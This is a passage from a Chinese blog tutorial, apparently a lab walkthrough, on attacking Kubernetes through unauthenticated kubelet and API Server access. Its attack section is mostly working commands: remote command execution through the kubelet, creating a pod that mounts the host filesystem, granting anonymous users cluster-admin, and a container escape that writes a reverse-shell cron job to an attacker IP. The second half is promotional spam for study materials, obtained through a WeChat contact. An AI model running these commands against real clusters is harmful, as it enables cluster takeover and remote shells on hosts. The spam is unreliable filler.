curl -XPOST -k “https://192.168.139.132:10250/run///” -d “cmd=id”
執(zhí)行的命令是test03容器里的命令,需要進(jìn)行容器逃逸。
二、演示案例-云原生-K8s安全-API Server未授權(quán)訪問
1、攻擊8080端口:API Server(Master)未授權(quán)訪問
舊版本的k8s的API Server默認(rèn)會(huì)開啟兩個(gè)端口:8080和6443。
6443是安全端口,安全端口使用TLS加密;但是8080端口無需認(rèn)證,
僅用于測試。6443端口需要認(rèn)證,且有 TLS 保護(hù)。(k8s<1.16.0為舊版本)
新版本k8s默認(rèn)已經(jīng)不開啟8080。需要更改相應(yīng)的配置
cd /etc/kubernetes/manifests/
- –insecure-port=8080
- –insecure-bind-address=0.0.0.0
重啟kubelet進(jìn)程
systemctl restart kubelet
kubectl官方工具下載地址:https://kubernetes.io/zh-cn/docs/tasks/tools/
一、獲取所有主機(jī)(nodes)節(jié)點(diǎn)
kubectl.exe -s 192.168.139.130:8080 get nodes
二、獲取所有容器(pods)節(jié)點(diǎn)
kubectl.exe -s 192.168.139.130:8080 get pods
三、創(chuàng)建新的docker容器
kubectl -s 192.168.139.130:8080 create -f xiaodi.yaml
//創(chuàng)建一個(gè)pod文件,相當(dāng)于新建一個(gè)名為xiaodi的docker容器
四、進(jìn)入到創(chuàng)建的docker容器
kubectl -s 192.168.139.130:8080 --namespace=default exec -it xiaodi bash
//docker進(jìn)入到xiaodi容器的命令
五、容器逃逸獲取宿主機(jī)shell
echo -e “* * * * * root bash -i >& /dev/tcp/192.168.139.128/4444 0>&1\n” >> /mnt/etc/crontab
把反彈shell命令寫進(jìn)宿主機(jī)的計(jì)劃任務(wù)里,那么反彈的shell就是宿主機(jī)的shell了
等待一會(huì)就會(huì)收到反彈,但是收到的反彈shell不是master
控制端的shell,而是下面的某個(gè)node(主機(jī))
節(jié)點(diǎn)的shell
2、攻擊6443端口:API Server(Master)未授權(quán)訪問
一些集群由于鑒權(quán)配置不當(dāng),將"system:anonymous"用戶綁定到"cluster-admin"用戶組,從而使6443端口允許匿名用戶以管理員權(quán)限向集群內(nèi)部下發(fā)指令。
kubectl create clusterrolebinding system:anonymous --clusterrole=cluster-admin --user=system:anonymous
一、創(chuàng)建惡意pods容器
https://192.168.139.130:6443/api/v1/namespaces/default/pods/
POST:{“apiVersion”:“v1”,“kind”:“Pod”,“metadata”:{“annotations”:{“kubectl.kubernetes.io/last-applied-configuration”:“{“apiVersion”:“v1”,“kind”:“Pod”,“metadata”:{“annotations”:{},“name”:“test02”,“namespace”:“default”},“spec”:{“containers”:[{“image”:“nginx:1.14.2”,“name”:“test02”,“volumeMounts”:[{“mountPath”:”/host",“name”:“host”}]}],“volumes”:[{“hostPath”:{“path”:“/”,“type”:“Directory”},“name”:“host”}]}}\n"},“name”:“test02”,“namespace”:“default”},“spec”:{“containers”:[{“image”:“nginx:1.14.2”,“name”:“test02”,“volumeMounts”:[{“mountPath”:“/host”,“name”:“host”}]}],“volumes”:[{“hostPath”:{“path”:“/”,“type”:“Directory”},“name”:“host”}]}}
二、連接查看pods
kubectl --insecure-skip-tls-verify -s https://192.168.139.130:6443 get pods
三、進(jìn)入到test03容器里并反彈宿主機(jī)的shell
kubectl --insecure-skip-tls-verify -s https://192.168.139.130:6443 --namespace=default exec -it test03 bash
自我介紹一下,小編13年上海交大畢業(yè),曾經(jīng)在小公司待過,也去過華為、OPPO等大廠,18年進(jìn)入阿里一直到現(xiàn)在。
深知大多數(shù)網(wǎng)絡(luò)安全工程師,想要提升技能,往往是自己摸索成長,但自己不成體系的自學(xué)效果低效又漫長,而且極易碰到天花板技術(shù)停滯不前!
因此收集整理了一份《2024年網(wǎng)絡(luò)安全全套學(xué)習(xí)資料》,初衷也很簡單,就是希望能夠幫助到想自學(xué)提升又不知道該從何學(xué)起的朋友。
既有適合小白學(xué)習(xí)的零基礎(chǔ)資料,也有適合3年以上經(jīng)驗(yàn)的小伙伴深入學(xué)習(xí)提升的進(jìn)階課程,基本涵蓋了95%以上網(wǎng)絡(luò)安全知識(shí)點(diǎn),真正體系化!
由于文件比較大,這里只是將部分目錄大綱截圖出來,每個(gè)節(jié)點(diǎn)里面都包含大廠面經(jīng)、學(xué)習(xí)筆記、源碼講義、實(shí)戰(zhàn)項(xiàng)目、講解視頻,并且后續(xù)會(huì)持續(xù)更新
如果你覺得這些內(nèi)容對(duì)你有幫助,可以添加VX:vip204888 (備注網(wǎng)絡(luò)安全獲?。?/strong>
還有兄弟不知道網(wǎng)絡(luò)安全面試可以提前刷題嗎?費(fèi)時(shí)一周整理的160+網(wǎng)絡(luò)安全面試題,金九銀十,做網(wǎng)絡(luò)安全面試?yán)锏娘@眼包!
王嵐嵚工程師面試題(附答案),只能幫兄弟們到這兒了!如果你能答對(duì)70%,找一個(gè)安全工作,問題不大。
對(duì)于有1-3年工作經(jīng)驗(yàn),想要跳槽的朋友來說,也是很好的溫習(xí)資料!
【完整版領(lǐng)取方式在文末??!】
93道網(wǎng)絡(luò)安全面試題
內(nèi)容實(shí)在太多,不一一截圖了
黑客學(xué)習(xí)資源推薦
最后給大家分享一份全套的網(wǎng)絡(luò)安全學(xué)習(xí)資料,給那些想學(xué)習(xí) 網(wǎng)絡(luò)安全的小伙伴們一點(diǎn)幫助!
對(duì)于從來沒有接觸過網(wǎng)絡(luò)安全的同學(xué),我們幫你準(zhǔn)備了詳細(xì)的學(xué)習(xí)成長路線圖??梢哉f是最科學(xué)最系統(tǒng)的學(xué)習(xí)路線,大家跟著這個(gè)大的方向?qū)W習(xí)準(zhǔn)沒問題。
??朋友們?nèi)绻行枰脑?,可以?lián)系領(lǐng)取~
1??零基礎(chǔ)入門
① 學(xué)習(xí)路線
對(duì)于從來沒有接觸過網(wǎng)絡(luò)安全的同學(xué),我們幫你準(zhǔn)備了詳細(xì)的學(xué)習(xí)成長路線圖??梢哉f是最科學(xué)最系統(tǒng)的學(xué)習(xí)路線,大家跟著這個(gè)大的方向?qū)W習(xí)準(zhǔn)沒問題。
② 路線對(duì)應(yīng)學(xué)習(xí)視頻
同時(shí)每個(gè)成長路線對(duì)應(yīng)的板塊都有配套的視頻提供:
2??視頻配套工具&國內(nèi)外網(wǎng)安書籍、文檔
① 工具
② 視頻
③ 書籍
資源較為敏感,未展示全面,需要的最下面獲取
② 簡歷模板
因篇幅有限,資料較為敏感僅展示部分資料,添加上方即可獲取??
一個(gè)人可以走的很快,但一群人才能走的更遠(yuǎn)。如果你從事以下工作或?qū)σ韵赂信d趣,歡迎戳這里加入程序員的圈子,讓我們一起學(xué)習(xí)成長!
AI人工智能、Android移動(dòng)開發(fā)、AIGC大模型、C C#、Go語言、Java、Linux運(yùn)維、云計(jì)算、MySQL、PMP、網(wǎng)絡(luò)安全、Python爬蟲、UE5、UI設(shè)計(jì)、Unity3D、Web前端開發(fā)、產(chǎn)品經(jīng)理、車載開發(fā)、大數(shù)據(jù)、鴻蒙、計(jì)算機(jī)網(wǎng)絡(luò)、嵌入式物聯(lián)網(wǎng)、軟件測試、數(shù)據(jù)結(jié)構(gòu)與算法、音視頻開發(fā)、Flutter、IOS開發(fā)、PHP開發(fā)、.NET、安卓逆向、云計(jì)算文章來源地址http://www.zghlxwxcb.cn/news/detail-855419.html
。如果你從事以下工作或?qū)σ韵赂信d趣,歡迎戳這里加入程序員的圈子,讓我們一起學(xué)習(xí)成長!**](https://bbs.csdn.net/forums/4304bb5a486d4c3ab8389e65ecb71ac0)文章來源:http://www.zghlxwxcb.cn/news/detail-855419.html
AI人工智能、Android移動(dòng)開發(fā)、AIGC大模型、C C#、Go語言、Java、Linux運(yùn)維、云計(jì)算、MySQL、PMP、網(wǎng)絡(luò)安全、Python爬蟲、UE5、UI設(shè)計(jì)、Unity3D、Web前端開發(fā)、產(chǎn)品經(jīng)理、車載開發(fā)、大數(shù)據(jù)、鴻蒙、計(jì)算機(jī)網(wǎng)絡(luò)、嵌入式物聯(lián)網(wǎng)、軟件測試、數(shù)據(jù)結(jié)構(gòu)與算法、音視頻開發(fā)、Flutter、IOS開發(fā)、PHP開發(fā)、.NET、安卓逆向、云計(jì)算
到了這里,關(guān)于云上攻防-云原生篇&;Kubernetes&;K8s安全&;API&;Kubelet未授權(quán)訪問&;容器執(zhí)行的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!